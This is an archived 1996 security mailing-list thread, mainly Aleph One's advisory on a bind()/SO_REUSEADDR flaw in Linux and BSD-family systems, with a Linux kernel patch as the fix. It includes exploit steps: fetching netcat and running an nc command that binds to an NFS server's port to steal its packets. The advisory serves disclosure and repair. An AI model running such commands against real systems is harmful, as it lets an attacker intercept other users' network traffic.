] Indeed. So do several other daemons. This bug has been introduced
] around 1.3.60 or so. I've been meaning to track it down, but didn't
] have time to do so yet. In any case, SO_REUSEADDR doesn't work
] on Linux.
Could your problem be related to the following security problem which
was fixed in Linux around 1.3.60. I remember changing xntpd for it to
work with the fix.
Delman
========================================================================
Date: Tue, 30 Jan 1996 15:18:21 -0800 (PST)
From: "Aleph's K-Rad GECOS Field" <aleph1@underground.org>
To: linux-security@tarsier.cv.nrao.edu
cc: linux-alert@tarsier.cv.nrao.edu, bugtraq@crimelab.com,
best-of-security@suburbia.net
Subject: bind() Security Problems
Message-ID: <Pine.LNX.3.91.960130151057.4068A-100000@underground.org>
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-linux-alert@tarsier.cv.nrao.edu
Precedence: special-delivery
Reply-To: linux-security@tarsier.cv.nrao.edu
Status: RO
Content-Length: 2824
System Call: bind()
Affected Operating System: Linux, SunOS, FreeBSD, BSDI, Ultrix
Probably others.
Requirement: account on system.
Security Compromise: Stealing packets from
nfsd, yppasswd, ircd, etc.
Credits: *Hobbit* <hobbit@avian.org>
bitblt <bitblt@infosoc.com>
Aleph One <aleph1@underground.org>
Synopsis: bind() does not properly check
to make sure there is not a socket
already bound to INADDR_ANY on the same
port when binding to a specific address.
On most systems, a combination of setting the SO_REUSEADDR
socket option, and a call to bind() allows any process to bind to
a port to which a previous process has bound width INADDR_ANY. This
allows a user to bind to the specific address of a server bound to
INADDR_ANY on an unprivileged port, and steal its udp packets/tcp
connection.
Exploit:
Download and compile netcat from ftp://ftp.avian.org/src/hacks/nc100.tgz
Make sure an nfs server is running:
w00p% netstat -a | grep 2049
udp 0 0 *.2049 *.* LISTEN
Run netcat:
w00p% nc -v -v -u -s 192.88.209.5 -p 2049
listening on [192.88.209.5] 2049 ...
Wait for packets to arrive.
Fix:
Linux: A patch was been sent to Linus and Alan Cox. It should be
included with 1.3.60. My original patch (included bellow) allows for
binds from the same uid, as some virtual hosting software like modified
httpds, and ftpds, may break otherwise.
Alan didnt like this, so all bind to the same port will
not be allowed in newer kernels. You should be able to easily adapt
this patch or Alan's patch to 1.2.13 without much trouble.
Others: Pray to your vendors.
--- begin patch ---
diff -u --recursive --new-file linux-1.3.57/net/ipv4/af_inet.c linux/net/ipv4/af_inet.c
--- linux-1.3.57/net/ipv4/af_inet.c Mon Dec 25 20:03:01 1995
+++ linux/net/ipv4/af_inet.c Tue Jan 16 19:46:28 1996
@@ -46,6 +46,8 @@
* Germano Caronni : Assorted small races.
* Alan Cox : sendmsg/recvmsg basic support.
* Alan Cox : Only sendmsg/recvmsg now supported.
+ * Aleph One : Rogue processes could steal packets
+ * from processes bound to INADDR_ANY.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
@@ -899,6 +901,12 @@
if (sk2->num != snum)
continue; /* more than one */
+ if ((sk2->rcv_saddr == 0 || sk->rcv_saddr == 0) &&
+ current->euid != sk2->socket->inode->i_uid)
+ {
+ sti();
+ return(-EADDRINUSE);
+ }
if (sk2->rcv_saddr != sk->rcv_saddr)
continue; /* socket per slot ! -FB */
if (!sk2->reuse || sk2->state==TCP_LISTEN)
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01